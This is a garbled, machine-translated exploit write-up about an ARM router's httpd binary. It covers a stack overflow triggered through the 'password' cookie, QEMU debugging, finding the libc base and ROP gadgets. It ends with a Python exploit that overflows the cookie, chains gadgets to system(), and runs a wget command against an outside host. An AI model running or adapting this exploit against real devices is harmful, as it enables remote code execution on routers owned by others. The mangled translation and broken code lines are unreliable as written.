The vulnerability analysis.
Vulnerabilities file is bin/httpd
Here will be the cookie of the password followed by the value copied to variable var_1c0, resulting in stack overflow
! [](/Article/UploadPic/2018-4/2018424183144648. png? www. myhack58. com)
The Arm the small end of the structure.
! [](/Article/UploadPic/2018-4/2018424183144798. png? www. myhack58. com)
The first arm architecture to qemu copied over.
cp $(which qemu-arm-static) ./ qemu
Use the following script to debug:
#!/ bin/bash
PORT=“1234”
chroot …/qemu-g $PORT ./ bin/httpd
Here will need to be connectcfm the return value of the patch of 1:
! [](/Article/UploadPic/2018-4/2018424183144655. png? www. myhack58. com)
Recommend keypatch Plug-In, can be in IDA directly modify the instruction, https://github.com/keystone-engine/keypatch
! [](/Article/UploadPic/2018-4/2018424183144167. png? www. myhack58. com)
After the http service can be up and running:
! [](/Article/UploadPic/2018-4/2018424183144422. png? www. myhack58. com)
In R7WebsSecurityHandler the next good breakpoint,
Exploit. py run, broken down:
! [](/Article/UploadPic/2018-4/2018424183145863. png? www. myhack58. com)
LR to store the return value, the address of FECDC, the var_1c0 is to be stored controllable input variables where FEB1C, so our palyload for A in FECDC-FEB1C)+BBBB(need to overwrite the return address)+ccccdddd it. Ran a wave, found no break to the pc=42424242 place, but[R3] error.
! [](/Article/UploadPic/2018-4/2018424183145906. png? www. myhack58. com)
In the copy of the complete password, but also will see the string if it contains”.” And”.” After the third bit is”gif”,if anything it will directly jump to the end, and not going to need to read[R3]place, 在payload里面加上.gif, pc to 42424242 at the crash.
! [](/Article/UploadPic/2018-4/2018424183145324. png? www. myhack58. com)
With nx, the stack of the code cannot be executed directly, and therefore must be ROP.
! [](/Article/UploadPic/2018-4/2018424183145952. png? www. myhack58. com)
Find the libc base address: the
! [](/Article/UploadPic/2018-4/2018424183145215. png? www. myhack58. com)
Libc=0x409c7000
But here there is a pit,the libc address is not correct,the rop chain will jump to the wrong place,
Look puts the address of the function:
! [](/Article/UploadPic/2018-4/2018424183146285. png? www. myhack58. com)
Puts in libc address:
! [](/Article/UploadPic/2018-4/2018424183146806. png? www. myhack58. com)
Then libc=409dccd4-35cd4=409A7000
Libc has system function,then you need to find a pop r0,sp is similar to the Code of the sp in the parameter into r0 to
ROPgadget–binary=./ lib/libc. so. 0 | grep”mov r0, sp”
Or –the only “pop”| grep“r0”,but pop {r0 pc} this command cannot be used,because the r0 parameter is too long,so need to put the pc Back, find the following two godget:
! [](/Article/UploadPic/2018-4/2018424183146968. png? www. myhack58. com)
! [](/Article/UploadPic/2018-4/2018424183146145. png? www. myhack58. com)
The first system pop into r3, then the sp in the command parameter into r0, 构造如下exploit.py to:
url = “http://%s:80/goform/exeCommand”%(host) libc=0x409a7000godget1=0x00018298 #pop r3 pcgodget1 = struct. pack(“,godget1+libc)system=0x0005A270system = struct. pack(”, system+libc)command=“wget192. 168. 174. 136"godget2 = 0x00040cb8 # mov r0, sp; blx r3godget2 = struct. pack(”, godget2 + libc)password = “A” * 444+“. gif”+godget1+system+godget2+commandreq = urllib2. Request(url)req. add_header(“Cookie”, “password=%s” % password)try: resp = urllib2. urlopen(req)except: pass